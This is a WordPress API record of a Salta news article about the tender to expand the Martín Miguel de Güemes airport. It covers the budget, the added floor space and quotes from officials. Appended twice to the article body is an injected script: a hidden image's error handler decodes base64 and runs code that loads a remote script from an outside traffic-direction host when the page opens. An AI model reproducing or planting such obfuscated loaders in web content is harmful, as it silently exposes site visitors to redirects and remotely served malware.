{"id":2129,"date":"2023-01-26T11:29:47","date_gmt":"2023-01-26T14:29:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2129"},"modified":"2025-08-14T00:24:46","modified_gmt":"2025-08-14T03:24:46","slug":"se-publico-la-licitacion-para-la-ampliacion-del-aeropuerto-martin-miguel-de-guemes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2129","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-publico-la-licitacion-para-la-ampliacion-del-aeropuerto-martin-miguel-de-guemes-87496\">Se public\u00f3 la licitaci\u00f3n para la ampliaci\u00f3n del aeropuerto Mart\u00edn Miguel de G\u00fcemes<\/a>"},"content":{"rendered":"\n<h5 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\">Aeropuertos Argentina 2000 public\u00f3 el llamado a licitaci\u00f3n gestionado por el gobernador Gustavo S\u00e1enz. Este proyecto federal y estrat\u00e9gico mejorar\u00e1 el flujo de pasajeros y la modernizaci\u00f3n de la terminal, que no paralizar\u00e1 su actividad en el tiempo de obra.<\/h5>\n\n\n\n<p>El aeropuerto Mart\u00edn Miguel de G\u00fcemes ser\u00e1 objeto de una inversi\u00f3n millonaria en los pr\u00f3ximos meses para potenciar su capacidad operativa creciendo m\u00e1s de un 50% su superficie; posibilitar\u00e1 que m\u00e1s pasajeros arriben a la provincia. Aeropuertos Argentina 2000 public\u00f3 el llamado a licitaci\u00f3n para iniciar el proceso de esta obra estrat\u00e9gica para Salta.&nbsp;&nbsp;<\/p>\n\n\n\n<p>El a\u00f1o pasado el aeropuerto salte\u00f1o fue uno de los que m\u00e1s vuelos recibi\u00f3 en el pa\u00eds, siendo l\u00edder en el Norte argentino seg\u00fan estad\u00edsticas de la Administraci\u00f3n Nacional de Aviaci\u00f3n Civil; por este motivo la ampliaci\u00f3n y modernizaci\u00f3n de la estaci\u00f3n fue gestionada y anunciada por el gobernador Gustavo S\u00e1enz. El mi\u00e9rcoles 1 de febrero autoridades nacionales arribar\u00e1n a Salta para formalizar el proceso.<\/p>\n\n\n\n<p>El presupuesto oficial asignado para la remodelaci\u00f3n y ampliaci\u00f3n es de $9.997 millones, el acto de apertura ser\u00e1 el 21 de marzo y luego de adjudicada la obra, el plazo de ejecuci\u00f3n ser\u00e1 de 25 meses. La terminal existente tiene una superficie total de 9.200 m2 y se planea construir 6.000 m2 m\u00e1s.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5556-se-publico-la-licitacion-para-la-ampliacion-del-aeropuerto-martin-miguel-de-guemes.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5556-se-publico-la-licitacion-para-la-ampliacion-del-aeropuerto-martin-miguel-de-guemes.jpeg\" alt=\"Se public\u00f3 la licitaci\u00f3n para la ampliaci\u00f3n del aeropuerto Mart\u00edn Miguel de G\u00fcemes\"\/><\/a><\/figure>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario<\/strong>&nbsp;<strong>Pe\u00f1a<\/strong>&nbsp;afirm\u00f3 que esta obra \u201cno solo es para los salte\u00f1os sino tambi\u00e9n para los turistas e impacta en el turismo, la producci\u00f3n y las diversas actividades econ\u00f3micas\u201d. Se\u00f1al\u00f3 que una inversi\u00f3n estrat\u00e9gica de este tipo marca un camino de \u201cfederalismo impulsado por el gobernador&nbsp;<strong>Gustavo<\/strong>&nbsp;<strong>S\u00e1enz<\/strong>&nbsp;de gestionar estos fondos que potencia las oportunidades para que Salta sea una puerta de ingreso a la Argentina\u201d.<\/p>\n\n\n\n<p>\u201cEste proyecto se suma a muchos otros proyectos en marcha que fueron gestionados por el gobernador Gustavo S\u00e1enz en estos tres a\u00f1os de gesti\u00f3n, que est\u00e1n sentando las bases para el desarrollo de Salta\u201d, sostuvo el funcionario.<\/p>\n\n\n\n<p>Actualmente el aeropuerto de Salta tiene conexi\u00f3n directa con Bariloche, Resistencia, Buenos Aires, Rosario, C\u00f3rdoba, Iguaz\u00fa, Neuqu\u00e9n, Mendoza y Tucum\u00e1n en el \u00e1mbito local y San Pablo (Brasil) en el plano internacional.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-publico-la-licitacion-para-la-ampliacion-del-aeropuerto-martin-miguel-de-guemes-87496\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Aeropuertos Argentina 2000 public\u00f3 el llamado a licitaci\u00f3n gestionado por el gobernador Gustavo S\u00e1enz. Este proyecto federal y estrat\u00e9gico mejorar\u00e1 el flujo de pasajeros y la modernizaci\u00f3n de la terminal, que no paralizar\u00e1 su actividad en el tiempo de obra. El aeropuerto Mart\u00edn Miguel de G\u00fcemes ser\u00e1 objeto de una inversi\u00f3n millonaria en los pr\u00f3ximos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2130,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,5],"tags":[],"class_list":{"0":"post-2129","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2129"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2129"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2129\/revisions"}],"predecessor-version":[{"id":7197,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2129\/revisions\/7197"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2130"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}